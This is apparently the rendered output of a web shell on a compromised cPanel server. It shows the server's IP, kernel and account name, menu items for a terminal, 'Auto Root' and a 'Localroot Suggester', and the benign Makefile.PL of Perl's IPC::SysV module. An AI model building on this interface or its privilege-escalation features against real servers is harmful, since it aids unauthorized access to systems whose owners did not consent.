Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
cpan /
IPC-SysV /
Delete
Unzip
Name
Size
Permission
Date
Action
blib
[ DIR ]
drwxr-xr-x
2016-10-10 17:39
hints
[ DIR ]
drwxr-xr-x
2015-02-14 16:55
lib
[ DIR ]
drwxr-xr-x
2015-02-14 16:55
t
[ DIR ]
drwxr-xr-x
2015-02-14 16:55
Makefile
30.36
KB
-rw-r--r--
2016-10-10 17:39
Makefile.PL
2.27
KB
-r--r--r--
2014-12-27 11:48
SysV.bs
0
B
-rw-r--r--
2016-10-10 17:41
SysV.c
22.99
KB
-rw-r--r--
2016-10-10 17:39
SysV.o
34.33
KB
-rw-r--r--
2016-10-10 17:39
SysV.xs
10.72
KB
-r--r--r--
2014-12-27 11:48
const-c.inc
26.13
KB
-rw-r--r--
2016-10-10 17:39
const-xs.inc
2.6
KB
-rw-r--r--
2016-10-10 17:39
pm_to_blib
0
B
-rw-r--r--
2016-10-10 17:39
ppport.h
183
KB
-rw-r--r--
2016-10-10 17:38
regen.pl
2.03
KB
-r--r--r--
2014-12-27 11:48
typemap
26
B
-r--r--r--
2014-12-27 11:48
Save
Rename
################################################################################ # # Version 2.x, Copyright (C) 2007-2013, Marcus Holland-Moritz <mhx@cpan.org>. # Version 1.x, Copyright (C) 1999, Graham Barr <gbarr@pobox.com>. # # This program is free software; you can redistribute it and/or # modify it under the same terms as Perl itself. # ################################################################################ require 5.004_05; use strict; use ExtUtils::MakeMaker; unless ($ENV{'PERL_CORE'}) { $ENV{'PERL_CORE'} = 1 if grep { $_ eq 'PERL_CORE=1' } @ARGV; } if ($^O eq 'MSWin32') { die "OS unsupported\n"; } WriteMakefile( NAME => 'IPC::SysV', VERSION_FROM => 'lib/IPC/SysV.pm', PREREQ_PM => { 'Test::More' => 0.45, }, CONFIGURE => \&configure, ); sub configure { my @moreopts; my %depend; if (eval $ExtUtils::MakeMaker::VERSION >= 6) { push @moreopts, AUTHOR => 'Marcus Holland-Moritz <mhx@cpan.org>', ABSTRACT_FROM => 'lib/IPC/SysV.pm'; } if (eval $ExtUtils::MakeMaker::VERSION >= 6.30_01) { print "Setting license tag...\n"; push @moreopts, LICENSE => 'perl'; } if ($ENV{'PERL_CORE'}) { # clean out const-* files in the core push @moreopts, realclean => { FILES => "const-c.inc const-xs.inc" }; } else { # IPC::SysV is in the core since 5.005 # 5.11.0+ has site before perl push @moreopts, INSTALLDIRS => ( ($] >= 5.005 and $] < 5.011) ? 'perl' : 'site' ); } $depend{'SysV.xs'} = 'const-c.inc const-xs.inc'; return { depend => \%depend, @moreopts }; } #--- MY package sub MY::libscan { package MY; my($self, $path) = @_; return $path if $self->SUPER::libscan($path) and $path !~ m! [~%]$ | \.(cache\.cm|swp|orig|rej)$ | regen\.pl$ !x; return ''; } sub MY::postamble { package MY; my $post = shift->SUPER::postamble(@_); $post .= <<'POSTAMBLE'; purge_all: realclean @$(RM_F) const-c.inc const-xs.inc regen: $(PERL) -I$(PERL_ARCHLIB) -I$(PERL_LIB) regen.pl const-c.inc: lib/IPC/SysV.pm regen.pl @$(MAKE) regen const-xs.inc: lib/IPC/SysV.pm regen.pl @$(MAKE) regen POSTAMBLE return $post; }